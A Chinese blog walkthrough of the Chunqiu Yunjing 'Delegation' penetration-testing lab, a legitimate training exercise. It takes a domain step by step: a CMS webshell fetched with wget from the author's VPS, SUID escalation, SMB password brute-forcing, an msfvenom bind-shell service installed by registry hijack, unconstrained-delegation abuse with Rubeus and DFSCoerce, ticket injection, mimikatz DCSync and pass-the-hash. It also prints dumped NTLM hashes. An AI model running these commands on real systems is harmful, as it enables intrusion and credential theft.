春秋云镜Delegation

14次阅读
没有评论

共计 4988 个字符,预计需要花费 13 分钟才能阅读完成。

flag01

首页是一个 cms,存在弱口令 admin/123456
春秋云镜 Delegation

版本比较老了,找找有没有历史 CVE
春秋云镜 Delegation

找了半天没找到,算了自己测试吧。
发现 html 模板可以加载 php 代码???
然后直接在编辑模板处把 index.html 修改成一句话木马
春秋云镜 Delegation
但是测试下来发现不知道为什么只能用 system
春秋云镜 Delegation

后面发现应该是和 index.php 冲突了之类的
然后可以在自己的 VPS 上写个木马,使用 wget http://xxxxxx/shell3.php下载木马并用蚁剑连接
春秋云镜 Delegation
执行命令有问题的话用下蚁剑的绕 disable_function,我这里刚刚还有问题现在又没了不知道为什么
看一下 suid 提权,发现存在 diff
春秋云镜 Delegation
直接拿到 flag 了

春秋云镜 Delegation

flag02

使用 vshell 搭建代理
依旧 fscan 内网扫描

(icmp) Target 172.22.4.19     is alive#FILESERVER.xiaorang.lab
(icmp) Target 172.22.4.7      is alive#DC:DC01.xiaorang.lab
(icmp) Target 172.22.4.45     is alive#XIAORANGWIN19
(icmp) Target 172.22.4.36     is alive# 立足点

然后根据刚刚 flag01 的提示去爆破密码

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19

发现一个过期的密码
春秋云镜 Delegation
尝试 rdp 远程上去
proxychains rdesktop 172.22.4.45
发现桌面有个文件夹,看看生成的 html 文件然后根据文件提示修改注册表 gupdate 但是这里需要 msfconsole 了之前用的 vshell 建立代理隧道有点不方便,想了下可以用 msf 正向连接

proxychains4rdesktop -r disk:LinuxShare=/home/kali <Windows_IP>
然后操作 msfconsole
先生成一个服务马,正常的马会挂掉

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -f exe-service -o service_bind.exe 生成后复制到 windows 的桌面

打开靶机的 cmd

reg add HKLMSYSTEMCurrentControlSetServicesgupdate /v ImagePath /t REG_EXPAND_SZ /d "C:UsersAdrianDesktopservice_bind.exe" 
sc start gupdate

正向连接


proxychains4 msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 4444
run

拿到 flag
春秋云镜 Delegation

flag03 and flag04

hashdump 一下
春秋云镜 Delegation

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:68365827d79c4f5cc9b52b688495fd51:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::

然后 load kiwi 再 creds_all 获取域内用户 hash
春秋云镜 Delegation

Username  Domain    NTLM                              SHA1
--------  ------    ----                              ----
Adrian    WIN19     68365827d79c4f5cc9b52b688495fd51  41ab23d1abfc618a7c05ee1a45f999799357f4dc
WIN19$    XIAORANG  c3f992027a4f8bbca096e95d6836a41e  2e1b2cbcbc78c761ab22f5ea3cb84ea850ecc3af
WIN19$    XIAORANG  5943c35371c96f19bda7b8e67d041727  5a4dc280e89974fdec8cf1b2b76399d26f39b8f8

在 msf 里面操作不方便,新建一个管理用户来吧

proxychains python psexec.py Administrator@172.22.4.45 -hashes :ba21c629d9fd56aff10c3e826323e6ab -codec gbk

春秋云镜 Delegation
重新用管理员用户连接
收集一下域内信息
利用工具 lzzbb/Adinfo: 域信息收集工具 (github.com) 进行信息收集。
春秋云镜 Delegation
发现一个 非约束委派,,那么只要域控来访问我们的服务,就会在我们本地的 lsass 进程中缓存目标的 TGT。
春秋云镜 Delegation
上传一个 Rubeus,准备进行抓取票据(也可以考虑用 mimikatz)
Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$
用 dfscoerce 触发 rpc 使 dc 向 WIN19 认证,这里接收端使用 ip 的时候成功率不高
proxychains4 python dfscoerce.py -u "WIN19$" -hashes :c3f992027a4f8bbca096e95d6836a41e -d xiaorang.lab win19 172.22.4.7

我这里一直接收不到票据,就先用别人的图吧
春秋云镜 Delegation
春秋云镜 Delegation
票据注入,命令如下

Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6Gu8cmnn/yivAbsIBGb083yJDB6dJRODHP1bjAfZvoz1YoZnroLlPjLrdCWRsj6+UL1JS+ZwTD5uUIrULi8ofZ+7vTw/ZJ3jDupn7VZM8vvgAcQnVurgK98Cj9jAdCm+Fy0kAIgWN/aWuw12x+lJ8t3O2B7esYh+mYQsLrqMqE+B5ORHxHU7SyLM9j8Ky11/rGPDjr72z6VewAFXVYEQo7+oaMQ84l/4BBGJVHXhlMQxrGJxnwiLw/X4chMEQ4rM8JQnxRggbhSg5TltT4g0QpTRjgp54OczjYJptkiGmAFOXGRSFNTjf460t+3w03rw9x8Gfyde3pYNYNktDCmEYrPq+4r8UlUTS5YOHr7pPogblzN57sLbYXbsGRdgAY/HzEqhcETSvi4qQ/jZU/59uS62oYrvjsEpAinAniyndHWp+hVD50OWcaCRwJGd1Q3XoQ9g1VqkkEa2k2aKh7cBxHw6uAG4Q1aKsNb9TyyZz/als1pUe6VFKWaGLjedwXKxYpF2fNbbR4OazHG+E3jNXJ5rSu2UKqr6r8wisfd52cqBx8BpPRZc+yf5EULPIbj7cLVnS0vp6Uvrc13AURc6s5NkUMFiMc+rXwUTF+bOouW5PjBApEIh/cT3XCg2Ems22K2jeJ9pRU9ZqccuOheGRu4gjPYEjpl48BZFJ0YNvQseUCs8plYZ7iOGh3pbq/ij/ImnEUe7RYLu3oEgMt5yjK4ptNGAxuH3I35dWKCDZ4692tH4W1sbx2yXYwVh2V7afMyFsIYsSmwDnUBGBB1KJY2Nq7XTu2cjWcXlEe1MtYuCdXGPc1mUBrjLOKfWlpAOowp9HgMyES6euks6uRRpugaCd9exWCNXTQ3HxgrXSXoJ9g3sT4wKBObqiY4RNWhImPC9bOTwCqR5LdKdTAPxwQyIFM5T14QmOpyrmeXmo0Ci+Q0Fm0w4NEZ0fi5zOxiKlbYMKKUgHsEDb6u90mXpdUYggfARpAnPPjzpbHA6AufTMhWSOpAwaXySzd6hEFBQfiZr79W0k/K4pCDMCrrN7IeM908XKGFmkt7b0Ti10xIX2dbfd7Oz5Kj8iSiLendtS8hXdu3j8Foxyigzaq78q03LH6adLVT8M7H/H5L2Yyj0pK8t7lgW8ruqnG9fCcEFvZF3riZ61Z7lOc1Ih0jPdbRxbxPNvEJ5cy81Z1rCMXlpsNikvdn3gyZcVMrQV0v6r5tpKbjXTWNzvuts7SCEhJQ1LAcWqTXnLmuOYTOIr5TOQ4laW0MYCmM4WzoizzgqF6B/GBBlaKjFq6sYs5WvrDrpU4oPSqWunEQYWqzv8WDQgpS6t4W1AI2YG5IEe5RcGS2rGGoYwALS+9ZxVh2QsGu2NPXGFb3BIj1nEFOdoqLzFW8TxqpHt3QuYLWb0UJWw0mbGCT7VRjmjLGBlBqbA86U0FZLjC8UmT54CUkwujgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCB12JvSkVI2yZgL857MedYXsBT+jZdt4RTe3dXQIjh1raEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI0MDExMzA4NTEwNFqmERgPMjAyNDAxMTMxODUxMDRapxEYDzIwMjQwMTIwMDg1MTA0WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

因为 dc 拥有 dcsync 的权限,所以直接可以获取域内所有的 hash。

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

春秋云镜 Delegation
成功拿到域管 hash

502     krbtgt  767e06b9c74fd628dd13785006a9092b        514
1105    Aldrich 98ce19dd5ce74f670d230c7b1aa016d0        512
1106    Marcus  b91c7cc463735bf0e599a2d0a04df110        512
1112    WIN-3X7U15C2XDM$        c3ddf0ffd17c48e6c40e6eda9c9fbaf7        4096
1113    WIN-YUUAW2QG9MF$        125d0e9790105be68deb6002690fc91b        4096
1000    DC01$   2aac0ab080878616924dee8d48190458        532480
500     Administrator   4889f6553239ace1f7c47fa2c619c252        512
1103    FILESERVER$     26eb4211fb2769c980125e4a432c7498        4096
1104    WIN19$  4017dab3eeaf981160632f84bbf00f73        528384

然后就是打 hash 传递不再复述了
春秋云镜 Delegation

春秋云镜 Delegation

正文完
 0
Rycarl
版权声明:本站原创文章,由 Rycarl 于2026-04-11发表,共计4988字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)
验证码